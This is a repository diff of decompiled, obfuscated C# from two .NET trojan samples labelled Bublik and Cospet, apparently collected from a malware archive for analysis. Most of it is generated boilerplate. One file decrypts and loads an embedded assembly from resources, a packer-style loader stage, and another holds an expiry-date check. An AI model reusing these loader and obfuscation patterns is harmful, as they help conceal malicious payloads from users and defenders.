private static c9b81fdde8dea987fa347362a8b38f66c.c5c7ec5333224c1213f04f873fa326520<c9b81fdde8dea987fa347362a8b38f66c.c02bb07968f48c37cae62c1da6810da6a> c36a0c1af97c708258e8cb849995781ef = new c9b81fdde8dea987fa347362a8b38f66c.c5c7ec5333224c1213f04f873fa326520<c9b81fdde8dea987fa347362a8b38f66c.c02bb07968f48c37cae62c1da6810da6a>();
private static readonly c9b81fdde8dea987fa347362a8b38f66c.c5c7ec5333224c1213f04f873fa326520<c9b81fdde8dea987fa347362a8b38f66c.ca60e2e08a2723dd3c979d21ff53a885d> c0f36fee1efd7b3eb9887972f47819e10 = new c9b81fdde8dea987fa347362a8b38f66c.c5c7ec5333224c1213f04f873fa326520<c9b81fdde8dea987fa347362a8b38f66c.ca60e2e08a2723dd3c979d21ff53a885d>();
[DebuggerNonUserCode]
static c9b81fdde8dea987fa347362a8b38f66c()
{
}
[HelpKeyword("My.Computer")]
internal static c989fcefb2025a0c5c08fe9654b0238e2 c92084a87c43349b13fd08cd6aff01d8f
{
[DebuggerHidden] get => c9b81fdde8dea987fa347362a8b38f66c.c6d6861147410be7d3c02208cc91f920b.ca3164a95c498711c0a73564c28375492;
}
[HelpKeyword("My.Application")]
internal static c1a978f6ad601a840a4c556c463434740 c8b84d0974b93f773bcc7dafeea38d1e0
{
[DebuggerHidden] get => c9b81fdde8dea987fa347362a8b38f66c.cf1913bd55cb878b4fcc66db187333603.ca3164a95c498711c0a73564c28375492;
}
[HelpKeyword("My.User")]
internal static User cd013fa95fd181d2291a68072d23b2631
{
[DebuggerHidden] get => c9b81fdde8dea987fa347362a8b38f66c.c5882d9714618e820b0e232605fa4e6a8.ca3164a95c498711c0a73564c28375492;
}
[HelpKeyword("My.Forms")]
internal static c9b81fdde8dea987fa347362a8b38f66c.c02bb07968f48c37cae62c1da6810da6a c0d14e620a03587bae92914b08d618907
{
[DebuggerHidden] get => c9b81fdde8dea987fa347362a8b38f66c.c36a0c1af97c708258e8cb849995781ef.ca3164a95c498711c0a73564c28375492;
}
[HelpKeyword("My.WebServices")]
internal static c9b81fdde8dea987fa347362a8b38f66c.ca60e2e08a2723dd3c979d21ff53a885d cbbd6ff9682fa668906b1351d071467e4
{
[DebuggerHidden] get => c9b81fdde8dea987fa347362a8b38f66c.c0f36fee1efd7b3eb9887972f47819e10.ca3164a95c498711c0a73564c28375492;
}
[EditorBrowsable(EditorBrowsableState.Never)]
[MyGroupCollection("System.Windows.Forms.Form", "Create__Instance__", "Dispose__Instance__", "My.MyProject.Forms")]
internal sealed class c02bb07968f48c37cae62c1da6810da6a
{
public Form1 cdb3f6ca4676597579d53d54a0d21304d;
[ThreadStatic]
private static Hashtable cc1f27d60b4baa0a608e20f5e465dfa47;
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public c02bb07968f48c37cae62c1da6810da6a()
{
}
public Form1 cf7c417efd3c27564c3ec7f3ff8a83d6a
{
[DebuggerNonUserCode] get
{
this.cdb3f6ca4676597579d53d54a0d21304d = c9b81fdde8dea987fa347362a8b38f66c.c02bb07968f48c37cae62c1da6810da6a.c34d836302883eefe8a38163efc65e0ad<Form1>(this.cdb3f6ca4676597579d53d54a0d21304d);
return this.cdb3f6ca4676597579d53d54a0d21304d;
}
[DebuggerNonUserCode] set
{
if (value == this.cdb3f6ca4676597579d53d54a0d21304d)
{
label_1:
switch (4)
{
case 0:
goto label_1;
default:
if (true)
break;
RuntimeMethodHandle runtimeMethodHandle = __methodref (c9b81fdde8dea987fa347362a8b38f66c.c02bb07968f48c37cae62c1da6810da6a.set_cf7c417efd3c27564c3ec7f3ff8a83d6a);
break;
}
}
else
{
if (value != null)
throw new ArgumentException(c0101fd8803cfd89ecc47c2ee5ea3536d.c63a0ab0f5643f828f13c6bbd6a2b539a(1));
this.cbb6da2598d8d80eb52e2d7caa80c7635<Form1>(ref this.cdb3f6ca4676597579d53d54a0d21304d);
}
}
}
[DebuggerHidden]
private static cd27155a99d37e18e8674d966126bfe7d c34d836302883eefe8a38163efc65e0ad<cd27155a99d37e18e8674d966126bfe7d>(
cd27155a99d37e18e8674d966126bfe7d ca56b1019bad311f5bf842dffe5f80e96)
where cd27155a99d37e18e8674d966126bfe7d : Form, new()
{
if ((object) ca56b1019bad311f5bf842dffe5f80e96 != null)
{
label_1:
switch (3)
{
case 0:
goto label_1;
default:
if (false)
{
// ISSUE: method reference
RuntimeMethodHandle runtimeMethodHandle = __methodref (c9b81fdde8dea987fa347362a8b38f66c.c02bb07968f48c37cae62c1da6810da6a.c34d836302883eefe8a38163efc65e0ad);
}
if (!ca56b1019bad311f5bf842dffe5f80e96.IsDisposed)
return ca56b1019bad311f5bf842dffe5f80e96;
label_5:
switch (1)
{
case 0:
goto label_5;
}
break;
}
}
if (c9b81fdde8dea987fa347362a8b38f66c.c02bb07968f48c37cae62c1da6810da6a.cc1f27d60b4baa0a608e20f5e465dfa47 != null)
{
label_7:
switch (5)
{
case 0:
goto label_7;
default:
if (c9b81fdde8dea987fa347362a8b38f66c.c02bb07968f48c37cae62c1da6810da6a.cc1f27d60b4baa0a608e20f5e465dfa47.ContainsKey((object) typeof (cd27155a99d37e18e8674d966126bfe7d)))
{
label_9:
switch (2)
{
case 0:
goto label_9;
default:
throw new InvalidOperationException(Utils.GetResourceString(c0101fd8803cfd89ecc47c2ee5ea3536d.c63a0ab0f5643f828f13c6bbd6a2b539a(72)));
}
}
else
break;
}
}
else
c9b81fdde8dea987fa347362a8b38f66c.c02bb07968f48c37cae62c1da6810da6a.cc1f27d60b4baa0a608e20f5e465dfa47 = new Hashtable();
c9b81fdde8dea987fa347362a8b38f66c.c02bb07968f48c37cae62c1da6810da6a.cc1f27d60b4baa0a608e20f5e465dfa47.Add((object) typeof (cd27155a99d37e18e8674d966126bfe7d), (object) null);
try
{
return new cd27155a99d37e18e8674d966126bfe7d();
}
catch (TargetInvocationException ex) when (
{
// ISSUE: unable to correctly present filter
ProjectData.SetProjectError((Exception) ex);
int num = ex.InnerException != null ? 1 : 0;
if (num != 0)
{
SuccessfulFiltering;
}
else
throw;
}
)
{
throw new InvalidOperationException(Utils.GetResourceString(c0101fd8803cfd89ecc47c2ee5ea3536d.c63a0ab0f5643f828f13c6bbd6a2b539a(129), ex.InnerException.Message), ex.InnerException);
}
finally
{
c9b81fdde8dea987fa347362a8b38f66c.c02bb07968f48c37cae62c1da6810da6a.cc1f27d60b4baa0a608e20f5e465dfa47.Remove((object) typeof (cd27155a99d37e18e8674d966126bfe7d));
}
}
[DebuggerHidden]
private void cbb6da2598d8d80eb52e2d7caa80c7635<cd27155a99d37e18e8674d966126bfe7d>(
ref cd27155a99d37e18e8674d966126bfe7d c6ac98bb3a5ad66bccc6228eddd2a459e)
where cd27155a99d37e18e8674d966126bfe7d : Form
{
c6ac98bb3a5ad66bccc6228eddd2a459e.Dispose();
c6ac98bb3a5ad66bccc6228eddd2a459e = default (cd27155a99d37e18e8674d966126bfe7d);
}
[EditorBrowsable(EditorBrowsableState.Never)]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[EditorBrowsable(EditorBrowsableState.Never)]
public override int GetHashCode() => base.GetHashCode();
[EditorBrowsable(EditorBrowsableState.Never)]
internal System.Type c45a762006a58631502e7d80a1fa57803() => typeof (c9b81fdde8dea987fa347362a8b38f66c.c02bb07968f48c37cae62c1da6810da6a);
[EditorBrowsable(EditorBrowsableState.Never)]
public override string ToString() => base.ToString();
}
[MyGroupCollection("System.Web.Services.Protocols.SoapHttpClientProtocol", "Create__Instance__", "Dispose__Instance__", "")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class ca60e2e08a2723dd3c979d21ff53a885d
{
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public ca60e2e08a2723dd3c979d21ff53a885d()
{
}
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override int GetHashCode() => base.GetHashCode();
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
internal System.Type c45a762006a58631502e7d80a1fa57803() => typeof (c9b81fdde8dea987fa347362a8b38f66c.ca60e2e08a2723dd3c979d21ff53a885d);
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public override string ToString() => base.ToString();
[DebuggerHidden]
private static cd27155a99d37e18e8674d966126bfe7d c34d836302883eefe8a38163efc65e0ad<cd27155a99d37e18e8674d966126bfe7d>(
cd27155a99d37e18e8674d966126bfe7d c6ac98bb3a5ad66bccc6228eddd2a459e)
where cd27155a99d37e18e8674d966126bfe7d : new()
{
if ((object) c6ac98bb3a5ad66bccc6228eddd2a459e != null)
return c6ac98bb3a5ad66bccc6228eddd2a459e;
label_1:
switch (3)
{
case 0:
goto label_1;
default:
if (false)
{
// ISSUE: method reference
RuntimeMethodHandle runtimeMethodHandle = __methodref (c9b81fdde8dea987fa347362a8b38f66c.ca60e2e08a2723dd3c979d21ff53a885d.c34d836302883eefe8a38163efc65e0ad);
}
return new cd27155a99d37e18e8674d966126bfe7d();
}
}
[DebuggerHidden]
private void cbb6da2598d8d80eb52e2d7caa80c7635<cd27155a99d37e18e8674d966126bfe7d>(
ref cd27155a99d37e18e8674d966126bfe7d c6ac98bb3a5ad66bccc6228eddd2a459e)
{
c6ac98bb3a5ad66bccc6228eddd2a459e = default (cd27155a99d37e18e8674d966126bfe7d);
}
}
[EditorBrowsable(EditorBrowsableState.Never)]
[ComVisible(false)]
internal sealed class c5c7ec5333224c1213f04f873fa326520<cd27155a99d37e18e8674d966126bfe7d> where cd27155a99d37e18e8674d966126bfe7d : new()
{
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public c5c7ec5333224c1213f04f873fa326520()
{
}
internal cd27155a99d37e18e8674d966126bfe7d ca3164a95c498711c0a73564c28375492
{
[DebuggerHidden] get
{
if ((object) c9b81fdde8dea987fa347362a8b38f66c.c5c7ec5333224c1213f04f873fa326520<cd27155a99d37e18e8674d966126bfe7d>.c2b01df8981e297847f68891fa241d529 == null)
{
label_1:
switch (4)
{
case 0:
goto label_1;
default:
if (false)
{
RuntimeMethodHandle runtimeMethodHandle = __methodref (c9b81fdde8dea987fa347362a8b38f66c.c5c7ec5333224c1213f04f873fa326520<>.get_ca3164a95c498711c0a73564c28375492);
}
c9b81fdde8dea987fa347362a8b38f66c.c5c7ec5333224c1213f04f873fa326520<cd27155a99d37e18e8674d966126bfe7d>.c2b01df8981e297847f68891fa241d529 = new cd27155a99d37e18e8674d966126bfe7d();
break;
}
}
return c9b81fdde8dea987fa347362a8b38f66c.c5c7ec5333224c1213f04f873fa326520<cd27155a99d37e18e8674d966126bfe7d>.c2b01df8981e297847f68891fa241d529;
}
}
}
}
}
MSIL/Trojan/Win32/B/Trojan.Win32.Bublik.elhu-ed0d569ec8fd2e2d6812dba8d62238da6ea0bd69bdb94d8701830057b4b02ac4/cb172a3cf4de66a26f276fa336a900f40.cs
+34
View File
@@ -0,0 +1,34 @@
// Decompiled with JetBrains decompiler
// Type: A.cb172a3cf4de66a26f276fa336a900f40
// Assembly: Club, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A9E8E336-37BF-4AEB-A0AA-C09A4AE1EC93
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-ed0d569ec8fd2e2d6812dba8d62238da6ea0bd69bdb94d8701830057b4b02ac4.exe
using System;
using System.Reflection;
namespace A
{
internal class cb172a3cf4de66a26f276fa336a900f40
{
internal static void c8a7fc1893bd951199feb87a0595012ad()
{
DateTime dateTime = new DateTime(long.Parse(c0101fd8803cfd89ecc47c2ee5ea3536d.c63a0ab0f5643f828f13c6bbd6a2b539a(231)));
if (!(DateTime.Now > dateTime))
return;
label_1:
switch (6)
{
case 0:
goto label_1;
default:
if (false)
{
// ISSUE: method reference
RuntimeMethodHandle runtimeMethodHandle = __methodref (cb172a3cf4de66a26f276fa336a900f40.c8a7fc1893bd951199feb87a0595012ad);
}
throw new Exception(c0101fd8803cfd89ecc47c2ee5ea3536d.c63a0ab0f5643f828f13c6bbd6a2b539a(268) + Assembly.GetExecutingAssembly().GetName().Name + c0101fd8803cfd89ecc47c2ee5ea3536d.c63a0ab0f5643f828f13c6bbd6a2b539a(299) + dateTime.ToString(c0101fd8803cfd89ecc47c2ee5ea3536d.c63a0ab0f5643f828f13c6bbd6a2b539a(471)) + c0101fd8803cfd89ecc47c2ee5ea3536d.c63a0ab0f5643f828f13c6bbd6a2b539a(494));
}
}
}
}
MSIL/Trojan/Win32/B/Trojan.Win32.Bublik.elhu-ed0d569ec8fd2e2d6812dba8d62238da6ea0bd69bdb94d8701830057b4b02ac4/cc67fcb12c7ab50e974a357101bdbe09d.cs
+25
View File
@@ -0,0 +1,25 @@
// Decompiled with JetBrains decompiler
// Type: A.cc67fcb12c7ab50e974a357101bdbe09d
// Assembly: Club, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A9E8E336-37BF-4AEB-A0AA-C09A4AE1EC93
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-ed0d569ec8fd2e2d6812dba8d62238da6ea0bd69bdb94d8701830057b4b02ac4.exe
using Club.My;
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Runtime.CompilerServices;
namespace A
{
[DebuggerNonUserCode]
[StandardModule]
[CompilerGenerated]
[HideModuleName]
internal sealed class cc67fcb12c7ab50e974a357101bdbe09d
{
[HelpKeyword("My.Settings")]
internal static MySettings Settings => MySettings.Default;
}
}
MSIL/Trojan/Win32/B/Trojan.Win32.Bublik.elhu-ed0d569ec8fd2e2d6812dba8d62238da6ea0bd69bdb94d8701830057b4b02ac4/ced138b6eee8b5fea3f196334f6720805.cs
+94
View File
@@ -0,0 +1,94 @@
// Decompiled with JetBrains decompiler
// Type: A.ced138b6eee8b5fea3f196334f6720805
// Assembly: Club, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A9E8E336-37BF-4AEB-A0AA-C09A4AE1EC93
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-ed0d569ec8fd2e2d6812dba8d62238da6ea0bd69bdb94d8701830057b4b02ac4.exe
using System;
using System.Reflection;
namespace A
{
internal class ced138b6eee8b5fea3f196334f6720805
{
private static readonly Assembly c7956d9417023ac40f6a0eb5665bf366c;
static ced138b6eee8b5fea3f196334f6720805()
{
if ((object) ced138b6eee8b5fea3f196334f6720805.c7956d9417023ac40f6a0eb5665bf366c != null)
return;
label_1:
switch (3)
{
case 0:
goto label_1;
default:
if (false)
{
// ISSUE: method reference
RuntimeMethodHandle runtimeMethodHandle = __methodref (ced138b6eee8b5fea3f196334f6720805.\u002Ecctor);
}
Assembly executingAssembly = Assembly.GetExecutingAssembly();
string name = executingAssembly.GetName().Name;
foreach (string manifestResourceName in executingAssembly.GetManifestResourceNames())
{
if (name == manifestResourceName)
{
label_6:
switch (3)
{
case 0:
goto label_6;
default:
ced138b6eee8b5fea3f196334f6720805.c7956d9417023ac40f6a0eb5665bf366c = Assembly.Load(c5269112b03e601219f1714817a27b79a.c09b1f452b50c37ba72a9d599e693a36c(executingAssembly.GetManifestResourceStream(name)));
return;
}
}
}
label_10:
switch (7)
{
case 0:
goto label_10;
default:
return;
}
}
}
internal static void c496a7d7e6524413c65d8aa7379640bb1() => AppDomain.CurrentDomain.ResourceResolve += new ResolveEventHandler(ced138b6eee8b5fea3f196334f6720805.c3e00543c0030da506a3c9417db159586);
private static Assembly c3e00543c0030da506a3c9417db159586(
object c932adab82a8e17f3df4be69b90bf6c46,
ResolveEventArgs c40515e8f64a790a3f5078c209ce553e3)
{
if ((object) ced138b6eee8b5fea3f196334f6720805.c7956d9417023ac40f6a0eb5665bf366c == null)
return ced138b6eee8b5fea3f196334f6720805.c7956d9417023ac40f6a0eb5665bf366c;
label_1:
switch (7)
{
case 0:
goto label_1;
default:
if (false)
{
// ISSUE: method reference
RuntimeMethodHandle runtimeMethodHandle = __methodref (ced138b6eee8b5fea3f196334f6720805.c3e00543c0030da506a3c9417db159586);
}
foreach (string manifestResourceName in ced138b6eee8b5fea3f196334f6720805.c7956d9417023ac40f6a0eb5665bf366c.GetManifestResourceNames())
{
if (manifestResourceName == c40515e8f64a790a3f5078c209ce553e3.Name)
return ced138b6eee8b5fea3f196334f6720805.c7956d9417023ac40f6a0eb5665bf366c;
}
label_9:
switch (4)
{
case 0:
goto label_9;
default:
return (Assembly) null;
}
}
}
}
}
MSIL/Trojan/Win32/B/Trojan.Win32.Bublik.elhu-ed0d569ec8fd2e2d6812dba8d62238da6ea0bd69bdb94d8701830057b4b02ac4/cfd7a845189f70212b2f34a945b41994e.cs
+61
View File
@@ -0,0 +1,61 @@
// Decompiled with JetBrains decompiler
// Type: A.cfd7a845189f70212b2f34a945b41994e
// Assembly: Club, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A9E8E336-37BF-4AEB-A0AA-C09A4AE1EC93
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-ed0d569ec8fd2e2d6812dba8d62238da6ea0bd69bdb94d8701830057b4b02ac4.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Globalization;
using System.Resources;
using System.Runtime.CompilerServices;
namespace A
{
[HideModuleName]
[CompilerGenerated]
[StandardModule]
[GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "2.0.0.0")]
[DebuggerNonUserCode]
internal sealed class cfd7a845189f70212b2f34a945b41994e
{
private static ResourceManager c3447dff4f91dc625360969fe10241192;
private static CultureInfo c62aab94b28f8800816ce1c0e53e796ba;
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static ResourceManager ResourceManager
{
get
{
if (object.ReferenceEquals((object) cfd7a845189f70212b2f34a945b41994e.c3447dff4f91dc625360969fe10241192, (object) null))
{
label_1:
switch (7)
{
case 0:
goto label_1;
default:
if (false)
{
RuntimeMethodHandle runtimeMethodHandle = __methodref (cfd7a845189f70212b2f34a945b41994e.get_ResourceManager);
}
cfd7a845189f70212b2f34a945b41994e.c3447dff4f91dc625360969fe10241192 = new ResourceManager(c0101fd8803cfd89ecc47c2ee5ea3536d.c63a0ab0f5643f828f13c6bbd6a2b539a(202), typeof (cfd7a845189f70212b2f34a945b41994e).Assembly);
break;
}
}
return cfd7a845189f70212b2f34a945b41994e.c3447dff4f91dc625360969fe10241192;
}
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static CultureInfo Culture
{
get => cfd7a845189f70212b2f34a945b41994e.c62aab94b28f8800816ce1c0e53e796ba;
set => cfd7a845189f70212b2f34a945b41994e.c62aab94b28f8800816ce1c0e53e796ba = value;
}
}
}
MSIL/Trojan/Win32/C/Trojan.Win32.Cospet.iat-d5a913ab25c2ac01f6ad36151285d226598951b3a4f0b2d52c03e99ff09f0807/0H9QJslJ8vJhl6OlA5/KcUfPq74sts8xsAS9e.cs
+255
View File
@@ -0,0 +1,255 @@
// Decompiled with JetBrains decompiler
// Type: 0H9QJslJ8vJhl6OlA5.KcUfPq74sts8xsAS9e
// Assembly: Service, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 7876418B-9B45-4205-B20B-41AA64972C85
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Cospet.iat-d5a913ab25c2ac01f6ad36151285d226598951b3a4f0b2d52c03e99ff09f0807.exe
using \u0030H9QJslJ8vJhl6OlA5;
using EJK98LujOyyfukEOeT;
using lIMo5cXu7QVSJ7hdyJ;
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.ApplicationServices;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.CodeDom.Compiler;
using System.Collections;
using System.ComponentModel;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Windows.Forms;
using TmwCXiWu118CwLLcBx;
using wuZRSCSYdAj3YejFZe;
using Yi0GE2NLaKY9cPmB45;
namespace \u0030H9QJslJ8vJhl6OlA5
{
[HideModuleName]
[GeneratedCode("MyTemplate", "8.0.0.0")]
[StandardModule]
internal sealed class KcUfPq74sts8xsAS9e
{
private static readonly KcUfPq74sts8xsAS9e.GpeR9n2Paga0nWthX6<DcHwE30dMCeD7BI4om> WFRhvVryq;
private static readonly KcUfPq74sts8xsAS9e.GpeR9n2Paga0nWthX6<\u0038fGOjUs9meXMHxwiww> c8YYC2iWn;
private static readonly KcUfPq74sts8xsAS9e.GpeR9n2Paga0nWthX6<User> \u0036QIwQWjoW;
private static KcUfPq74sts8xsAS9e.GpeR9n2Paga0nWthX6<KcUfPq74sts8xsAS9e.nK9D6s47SZZEpvtpVv> hrZyIqIeX;
private static readonly KcUfPq74sts8xsAS9e.GpeR9n2Paga0nWthX6<KcUfPq74sts8xsAS9e.jZwrCrgGT6gfLDQk2E> ggaWNB3kv;
[MethodImpl(MethodImplOptions.NoInlining)]
static KcUfPq74sts8xsAS9e()
{
qriSERnLWqCHHxhiWL.mQJJcrKz2UjcR();
KcUfPq74sts8xsAS9e.WFRhvVryq = new KcUfPq74sts8xsAS9e.GpeR9n2Paga0nWthX6<DcHwE30dMCeD7BI4om>();
KcUfPq74sts8xsAS9e.c8YYC2iWn = new KcUfPq74sts8xsAS9e.GpeR9n2Paga0nWthX6<\u0038fGOjUs9meXMHxwiww>();
KcUfPq74sts8xsAS9e.\u0036QIwQWjoW = new KcUfPq74sts8xsAS9e.GpeR9n2Paga0nWthX6<User>();
KcUfPq74sts8xsAS9e.hrZyIqIeX = new KcUfPq74sts8xsAS9e.GpeR9n2Paga0nWthX6<KcUfPq74sts8xsAS9e.nK9D6s47SZZEpvtpVv>();
KcUfPq74sts8xsAS9e.ggaWNB3kv = new KcUfPq74sts8xsAS9e.GpeR9n2Paga0nWthX6<KcUfPq74sts8xsAS9e.jZwrCrgGT6gfLDQk2E>();
}
[HelpKeyword("My.Computer")]
internal static DcHwE30dMCeD7BI4om qHJBW149c
{
[DebuggerHidden, MethodImpl(MethodImplOptions.NoInlining)] get => KcUfPq74sts8xsAS9e.WFRhvVryq.FFGVyGxjw();
}
[HelpKeyword("My.Application")]
internal static \u0038fGOjUs9meXMHxwiww shLcqe8nZ
{
[DebuggerHidden, MethodImpl(MethodImplOptions.NoInlining)] get => KcUfPq74sts8xsAS9e.c8YYC2iWn.FFGVyGxjw();
}
[HelpKeyword("My.User")]
internal static User rfbFjvHZw
{
[DebuggerHidden, MethodImpl(MethodImplOptions.NoInlining)] get => KcUfPq74sts8xsAS9e.\u0036QIwQWjoW.FFGVyGxjw();
}
[HelpKeyword("My.Forms")]
internal static KcUfPq74sts8xsAS9e.nK9D6s47SZZEpvtpVv fMQ7ZN6B5
{
[DebuggerHidden, MethodImpl(MethodImplOptions.NoInlining)] get => KcUfPq74sts8xsAS9e.hrZyIqIeX.FFGVyGxjw();
}
[HelpKeyword("My.WebServices")]
internal static KcUfPq74sts8xsAS9e.jZwrCrgGT6gfLDQk2E gdAC6AXkP
{
[DebuggerHidden, MethodImpl(MethodImplOptions.NoInlining)] get => KcUfPq74sts8xsAS9e.ggaWNB3kv.FFGVyGxjw();
}
[EditorBrowsable(EditorBrowsableState.Never)]
[MyGroupCollection("System.Windows.Forms.Form", "Create__Instance__", "Dispose__Instance__", "My.MyProject.Forms")]
internal sealed class nK9D6s47SZZEpvtpVv
{
public l1YmlpPMvQyqqZeffw \u0038B3TnRGbk;
[ThreadStatic]
private static Hashtable fMQ7ZN6B5;
[SpecialName]
[MethodImpl(MethodImplOptions.NoInlining)]
public l1YmlpPMvQyqqZeffw shLcqe8nZ()
{
this.\u0038B3TnRGbk = KcUfPq74sts8xsAS9e.nK9D6s47SZZEpvtpVv.FFGVyGxjw<l1YmlpPMvQyqqZeffw>(this.\u0038B3TnRGbk);
return this.\u0038B3TnRGbk;
}
[SpecialName]
[MethodImpl(MethodImplOptions.NoInlining)]
public void UA6v9sAn3([In] l1YmlpPMvQyqqZeffw obj0)
{
if (obj0 == this.\u0038B3TnRGbk)
return;
if (obj0 != null)
throw new ArgumentException(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(0));
this.qHJBW149c<l1YmlpPMvQyqqZeffw>(ref this.\u0038B3TnRGbk);
}
[DebuggerHidden]
[MethodImpl(MethodImplOptions.NoInlining)]
private static T FFGVyGxjw<T>(T Instance) where T : Form, new()
{
if ((object) Instance != null && !Instance.IsDisposed)
return Instance;
if (KcUfPq74sts8xsAS9e.nK9D6s47SZZEpvtpVv.fMQ7ZN6B5 != null)
{
if (KcUfPq74sts8xsAS9e.nK9D6s47SZZEpvtpVv.fMQ7ZN6B5.ContainsKey((object) typeof (T)))
throw new InvalidOperationException(Utils.GetResourceString(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(74)));
}
else
KcUfPq74sts8xsAS9e.nK9D6s47SZZEpvtpVv.fMQ7ZN6B5 = new Hashtable();
KcUfPq74sts8xsAS9e.nK9D6s47SZZEpvtpVv.fMQ7ZN6B5.Add((object) typeof (T), (object) null);
try
{
return new T();
}
catch (TargetInvocationException ex) when (
{
// ISSUE: unable to correctly present filter
ProjectData.SetProjectError((Exception) ex);
if (ex.InnerException != null)
{
SuccessfulFiltering;
}
else
throw;
}
)
{
throw new InvalidOperationException(Utils.GetResourceString(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(134), ex.InnerException.Message), ex.InnerException);
}
finally
{
KcUfPq74sts8xsAS9e.nK9D6s47SZZEpvtpVv.fMQ7ZN6B5.Remove((object) typeof (T));
}
}
[DebuggerHidden]
[MethodImpl(MethodImplOptions.NoInlining)]
private void qHJBW149c<T>([In] ref T obj0) where T : Form
{
obj0.Dispose();
obj0 = default (T);
}
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
[MethodImpl(MethodImplOptions.NoInlining)]
public nK9D6s47SZZEpvtpVv()
{
qriSERnLWqCHHxhiWL.mQJJcrKz2UjcR();
// ISSUE: explicit constructor call
base.\u002Ector();
}
[EditorBrowsable(EditorBrowsableState.Never)]
[MethodImpl(MethodImplOptions.NoInlining)]
public override bool Equals([In] object obj0) => base.Equals(RuntimeHelpers.GetObjectValue(obj0));
[EditorBrowsable(EditorBrowsableState.Never)]
[MethodImpl(MethodImplOptions.NoInlining)]
public override int GetHashCode() => base.GetHashCode();
[EditorBrowsable(EditorBrowsableState.Never)]
[MethodImpl(MethodImplOptions.NoInlining)]
internal System.Type b959I19JP() => typeof (KcUfPq74sts8xsAS9e.nK9D6s47SZZEpvtpVv);
[EditorBrowsable(EditorBrowsableState.Never)]
[MethodImpl(MethodImplOptions.NoInlining)]
public override string ToString() => base.ToString();
}
[EditorBrowsable(EditorBrowsableState.Never)]
[MyGroupCollection("System.Web.Services.Protocols.SoapHttpClientProtocol", "Create__Instance__", "Dispose__Instance__", "")]
internal sealed class jZwrCrgGT6gfLDQk2E
{
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
[MethodImpl(MethodImplOptions.NoInlining)]
public override bool Equals([In] object obj0) => base.Equals(RuntimeHelpers.GetObjectValue(obj0));
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
[MethodImpl(MethodImplOptions.NoInlining)]
public override int GetHashCode() => base.GetHashCode();
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
[MethodImpl(MethodImplOptions.NoInlining)]
internal System.Type FFGVyGxjw() => typeof (KcUfPq74sts8xsAS9e.jZwrCrgGT6gfLDQk2E);
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
[MethodImpl(MethodImplOptions.NoInlining)]
public override string ToString() => base.ToString();
[DebuggerHidden]
[MethodImpl(MethodImplOptions.NoInlining)]
private static T qHJBW149c<T>(T instance) where T : new() => (object) instance == null ? new T() : instance;
[DebuggerHidden]
[MethodImpl(MethodImplOptions.NoInlining)]
private void b959I19JP<T>([In] ref T obj0) => obj0 = default (T);
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
[MethodImpl(MethodImplOptions.NoInlining)]
public jZwrCrgGT6gfLDQk2E()
{
qriSERnLWqCHHxhiWL.mQJJcrKz2UjcR();
// ISSUE: explicit constructor call
base.\u002Ector();
}
}
[EditorBrowsable(EditorBrowsableState.Never)]
[ComVisible(false)]
internal sealed class GpeR9n2Paga0nWthX6<T> where T : new()
{
[DebuggerHidden]
[SpecialName]
[MethodImpl(MethodImplOptions.NoInlining)]
internal T FFGVyGxjw()
{
// ISSUE: reference to a compiler-generated field
if ((object) KcUfPq74sts8xsAS9e.GpeR9n2Paga0nWthX6<T>.b959I19JP == null)
{
// ISSUE: reference to a compiler-generated field
KcUfPq74sts8xsAS9e.GpeR9n2Paga0nWthX6<T>.b959I19JP = new T();
}
// ISSUE: reference to a compiler-generated field
return KcUfPq74sts8xsAS9e.GpeR9n2Paga0nWthX6<T>.b959I19JP;
}
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
[MethodImpl(MethodImplOptions.NoInlining)]
public GpeR9n2Paga0nWthX6()
{
qriSERnLWqCHHxhiWL.mQJJcrKz2UjcR();
// ISSUE: explicit constructor call
base.\u002Ector();
}
}
}
}
